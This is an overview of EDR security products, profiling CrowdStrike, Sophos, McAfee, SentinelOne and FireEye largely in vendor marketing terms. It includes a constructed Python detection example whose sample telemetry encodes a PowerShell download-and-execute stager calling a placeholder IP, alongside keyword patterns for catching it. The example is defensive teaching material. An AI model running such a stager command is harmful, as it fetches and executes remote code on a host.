Typical features to look for in EDR software.
ALERTS / NOTIFICATIONS:
Send alerts and notify critical stakeholders whenever the
solution discovers a threat or anomaly in the network.
ANOMALY / MALWARE DETECTION:
Scan and detect potentially dangerous and harmful software
that can disrupt or damage an endpoint or gain unauthorized
access to a network.
REPORTING / ANALYTICS:
View and track metrics related to network security.
REMEDIATION MANAGEMENT:
Identify and implement steps to restore systems to optimal
conditions.
BEHAVIOURAL ANALYTICS:
Continuously track the behavior of the systems connected to a
network to check for anomalies.
CONTINUOUS MONITORING:
Continuously assess and monitor system health and
application usage.
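The feature list above is written in product terms. As an added example (not from the original deck or from any vendor), the block below shows what the detection half of an EDR pipeline actually does with endpoint telemetry: behavioral rules over process-creation events (an Office application spawning a script host, encoded PowerShell whose payload is decoded and inspected, an svchost.exe with an unexpected parent), a static indicator-of-compromise match against a hash feed, and a per-host roll-up of the kind an alert notification to stakeholders would carry. The event schema, the sample events, the IoC hashes and the rule names are all constructed for this example and do not correspond to any vendor's format.

```python
"""Toy EDR detection pass over process-creation telemetry (constructed example,
not vendor code): behavioral rules plus IoC hash matching, rolled up into
per-host alert counts of the kind a notification step would send."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Constructed sample telemetry; field names are assumptions, not a vendor schema.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')".encode("utf-16-le")
).decode()
EVENTS = [
    {"host": "ws01", "pid": 4100, "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "WINWORD.EXE /n report.docx", "sha256": "a1" * 32},
    {"host": "ws01", "pid": 4188, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}", "sha256": "b2" * 32},
    {"host": "ws02", "pid": 5120, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "sha256": "c3" * 32},
    {"host": "ws02", "pid": 5301, "parent": "explorer.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe", "sha256": "d4" * 32},
    {"host": "ws03", "pid": 6010, "parent": "explorer.exe", "image": "update.exe",
     "cmdline": "update.exe /silent", "sha256": "e5" * 32},
]
IOC_HASHES = {"e5" * 32}  # constructed threat-intel feed of malicious SHA-256s

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
STAGER_HINTS = re.compile(r"(?i)iex|invoke-expression|downloadstring|frombase64string")


@dataclass(frozen=True)
class Alert:
    host: str
    pid: int
    rule: str
    severity: str
    detail: str


def decode_encoded_powershell(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_ioc_hash(ev: dict, iocs: set[str]) -> Alert | None:
    """Static detection: the image hash is on the threat-intel feed."""
    if ev["sha256"] not in iocs:
        return None
    return Alert(ev["host"], ev["pid"], "ioc_hash_match", "high", f"{ev['image']} is on the IoC feed")


def rule_office_spawns_script(ev: dict) -> Alert | None:
    """Behavioral: an Office process launching a script host (typical macro payload)."""
    if ev["parent"].lower() not in OFFICE_APPS or ev["image"].lower() not in SCRIPT_HOSTS:
        return None
    return Alert(ev["host"], ev["pid"], "office_spawns_script_host", "high", f"{ev['parent']} -> {ev['image']}")


def rule_encoded_powershell(ev: dict) -> Alert | None:
    """Behavioral: encoded PowerShell; severity rises when the payload looks like a stager."""
    decoded = decode_encoded_powershell(ev["cmdline"]) if ev["image"].lower() == "powershell.exe" else None
    if decoded is None:
        return None
    severity = "high" if STAGER_HINTS.search(decoded) else "medium"
    return Alert(ev["host"], ev["pid"], "encoded_powershell", severity, f"decoded: {decoded[:60]}")


def rule_svchost_unexpected_parent(ev: dict) -> Alert | None:
    """Behavioral: svchost.exe whose parent is not services.exe (masquerading)."""
    if ev["image"].lower() != "svchost.exe" or ev["parent"].lower() == "services.exe":
        return None
    return Alert(ev["host"], ev["pid"], "svchost_unexpected_parent", "medium", f"parent was {ev['parent']}")


def detect(events: list[dict], iocs: set[str] = IOC_HASHES) -> list[Alert]:
    """Run every rule over every event; one event can raise several alerts."""
    rules = (lambda e: rule_ioc_hash(e, iocs), rule_office_spawns_script,
             rule_encoded_powershell, rule_svchost_unexpected_parent)
    return [a for ev in events for rule in rules if (a := rule(ev)) is not None]


def summarize(alerts: list[Alert]) -> dict[str, dict[str, int]]:
    """Per-host severity counts, the roll-up a notification to stakeholders would carry."""
    out: dict[str, dict[str, int]] = {}
    for a in alerts:
        per_host = out.setdefault(a.host, {})
        per_host[a.severity] = per_host.get(a.severity, 0) + 1
    return out


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a.severity.upper():6}] {a.host} pid={a.pid} {a.rule}: {a.detail}")
    print(summarize(detect(EVENTS)))
```

Two points worth noticing: the encoded-command rule decodes the payload before deciding severity, which is what separates a behavioral detection from a plain string match on "-enc"; and the benign svchost.exe started by services.exe on ws02 raises nothing, while the one started from explorer.exe does, which is the parent/child context a real agent gets from the kernel rather than from file scanning.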
CROWDSTRIKE FALCON INSIGHT
Falcon Insight is the EDR module of the CrowdStrike Falcon
Endpoint Protection Enterprise bundle, which also includes NGAV,
threat intelligence, USB device protection and threat hunting.
EDR Features:
Automatically uncovers stealthy attackers - applies
behavioral analytics to detect traces of suspicious behavior.
Integrates with threat intelligence - faster detection of the
activities, tactics, techniques and procedures identified as
malicious.
Fast remediation and real-time response - isolates an
endpoint under attack from the network; provides built-in
remote execution commands including deleting a file, killing
a process, running a script, and restarting or shutting down the host.
Information Collectors - enable analysts to explore the file
system, list running processes, retrieve Windows event logs,
extract process memory, collect environment variables, etc.
Remediation actions enable teams to take action to
contain or remediate a threat with speed and decisiveness.
https://mysoftwhere.com/product/falcon-insight
SOPHOS INTERCEPT X
Sophos Intercept X Advanced with XDR integrates endpoint
detection and response (EDR) with what Sophos calls the industry's
top-rated endpoint protection. Built for both IT security operations
and threat hunting, Intercept X detects and investigates
suspicious activity with AI-driven analysis. Sophos positions it as
adding expertise rather than headcount, by replicating the skills of
hard-to-find analysts.
EDR Features:
Threat hunting - Proactive 24/7 hunting by Sophos's team
of threat analysts, who determine the potential impact and
context of threats to the business.
Incident response - Initiates actions to remotely disrupt,
contain and neutralize threats on the customer's behalf, including
the most sophisticated ones.
Continuous Improvement - Get actionable advice for
addressing the root cause of recurring incidents to stop
them from occurring again.
XDR Enabled - Sophos XDR is included so Sophos analysts
can detect and neutralize security threats from all available
data sources while you can identify and remediate IT issues
across your estate.
https://mysoftwhere.com/product/sophos-intercept-x
McAfee MVISION EDR
McAfee MVISION EDR helps you get ahead of modern threats
with AI-guided investigations that surface relevant risks and
automate and remove the manual labor of gathering and
analyzing evidence.
MVISION EDR reduces mean time to detect and respond to
threats by enabling all analysts to understand alerts, fully
investigate and quickly respond. Advanced analytics broaden
detection and make sense of alerts. Artificial intelligence (AI)
guided investigations and automation equip even novice
analysts to analyze at a higher level.
EDR Features:
File, Fileless and Zero-day threat defenses - Local and
cloud based detections along with machine learning
analyze the latest threats no matter how they attempt to
avoid detection.
Unified Management - A single pane of glass for
Windows, McAfee and third-party technologies, along with
combined dashboards and policy management, helps you
visualize threats and take action in less time.
Automatic remediation & Credential theft
monitoring – Instead of reimaging or repairing an infected
machine, MVISION Endpoint returns it to a healthy state. It
blocks attempts to harvest user credentials, preventing
potential breaches before they can begin.
Spend less time managing policies - Remove redundant
policy management by creating McAfee, Windows
Defender Antivirus, Defender Exploit Guard and Windows
Firewall policies in one motion.
Prioritized Data at a Glance - A single console gives
visibility into threats and compliance. An easy-to-use
dashboard and configurable alerts guide you to the most
important data.
https://mysoftwhere.com/product/mvision-edr
SENTINELONE SINGULARITY
An advanced EDR tool that uses AI-powered threat detection
and response. It combines EDR and endpoint protection
platform (EPP) capabilities and operates across all aspects of a
network, including endpoints, containers, cloud workloads and
internet of things (IoT) devices.
Its patented behavioral and static AI models provide
automation for identifying and blocking threats. SentinelOne
offers protection against executable and memory-only malware,
exploits in documents, spear-phishing emails, macros, drive-by
downloads and other browser exploits, scripts such as
PowerShell, and credential theft.
EDR Features:
Administration - SentinelOne simplifies endpoint
management. It offers a centralized console for managing assets
and discovering and controlling devices.
Detection and response - Machine learning and AI allow
SentinelOne to anticipate and identify threats in real-time. It
continuously hunts for threats throughout a network, using
patented behavioral AI to recognize potentially malicious
behavior.
It can detect fileless, zero-day and nation-state grade attacks.
SentinelOne also provides automated response. When threats
are detected, it can isolate, quarantine and even remediate
without human intervention.
Analytics - Part of what makes SentinelOne such a powerful
solution is its analytics-based approach to threat detection and
response. The combination of data collection, behavioral
analysis, AI and machine learning, as well as robust incident
reporting, provides an abundance of threat intelligence to
proactively identify new threats and offer remediation.
https://mysoftwhere.com/product/sentinelone-active-edr
FIREEYE ENDPOINT SECURITY
FireEye Endpoint is a standalone endpoint product. It integrates
with the FireEye Helix security operations platform, which
includes endpoint and network detection, ingests third-party
alerts from firewalls, and enables automation back to the
endpoint.
FireEye Endpoint Security supports the investigation of
sophisticated breaches, as well as detection and prevention
capabilities to help respond to threats that bypass traditional
endpoint defenses. It also includes AV through an OEM
partnership. What it terms nation-state grade threat intelligence
is characterized as a differentiator. It also harnesses multiple
detection engines and contextual enterprise search.
EDR Features:
Continuous real-time monitoring - FireEye EDR works
through continuous monitoring of the endpoint using
indicators of compromise (IoCs). Automating this monitoring
gives:
Streamlined threat detection process
Instant threat detection
Investigation, reporting and response enablement
Complete Visibility across entire network - FireEye EDR
offers complete, in-depth visibility across all the
organization's endpoints, with all devices covered for threat
detection.
Manage many thousands of endpoint agents
Detect threats across the organization
Centralized management console
Rapid incident response times - FireEye EDR is able to
respond to threats in real time. Many endpoint threats can
bypass traditional and advanced security in the time it takes
for a human to respond to the activity. With EDR, clients
benefit from:
Automated detection process
Significantly reduced time to detection
Ability to respond within minutes
https://mysoftwhere.com/product/fireeye-endpoint-security